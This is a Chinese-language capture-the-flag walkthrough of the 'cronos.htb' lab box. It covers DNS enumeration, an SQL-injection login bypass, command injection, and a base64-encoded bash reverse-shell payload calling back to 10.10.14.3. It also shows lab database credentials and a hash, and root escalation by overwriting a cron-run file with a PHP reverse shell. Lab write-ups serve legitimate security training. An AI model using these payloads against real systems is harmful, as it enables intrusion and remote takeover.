nmap扫描,开启22、80、53,其中80对应apache默认web服务

尝试对DNS服务进行攻击
dig查询,没有信息。dig axfr可以用于检测区域传送漏洞。


使用nslookup查询,得到一个域名ns1.cronos.htb

基于获取到的域名,再次进行dig查询,得到域名admin.cronos.htb

修改本地hosts文件,访问http://admin.cronos.htb,得到一个web页面

通过万能密码成功登录到后台;UserName:admin' or 1=1#

后台看起来很象命令执行的利用,尝试之后确实如此。payload:8.8.8.8;ls

直接反弹shell;payload:8.8.8.8;echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzQgMD4mMSc=|base64 -d|bash -i

信息收集,看到普通用户noulis

在web服务的路径下发现config.php,得到数据库连接方式admin/kEjdbRigfBHUREiNSDs;尝试使用该密码直接登录noulis的ssh,但是失败。

既然给了数据库密码,那么就看一下数据库,果然存在,但是仅对127.0.0.1开启监听。

为了方便,直接查询;得到密码4f5fffa7b2340178a716e3832451e058,看起来是MD5值。
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "show databases;"
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "use admin;show tables;"
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "use admin;show tables;select * from admin.users;"

MD5解密,得到明文:1327663704;但是这个密码也无法登录noulis用户。

只好上传linenum进行信息收集,只发现noulis有特殊权限。

继续收集信息,找到另一个web目录laravel

在apache2的配置文件中找到另一个域名www.cronos.htb

访问后得到如下页面,但是分析之后,laravel同样也是运行在www-data权限下的,所以就算RCE也同样拿到的www-data权限。

回过头看,发现定时任务中存在特殊内容,且以root权限运行。涉及到文件/var/www/laravel/artisan

该文件是www-data可以控制的,所以可以直接替换文件为php反弹shell脚本,等待定时任务触发执行。

文章描述了一次渗透测试的过程,从nmap扫描发现开放端口,利用DNS服务获取域名,进一步挖掘到web服务的后台漏洞,通过命令执行获取系统信息。在数据库中找到用户密码但无法SSH登录,最后利用定时任务和artisan文件实现root权限的PHP反弹shell。
474

被折叠的 条评论
为什么被折叠?



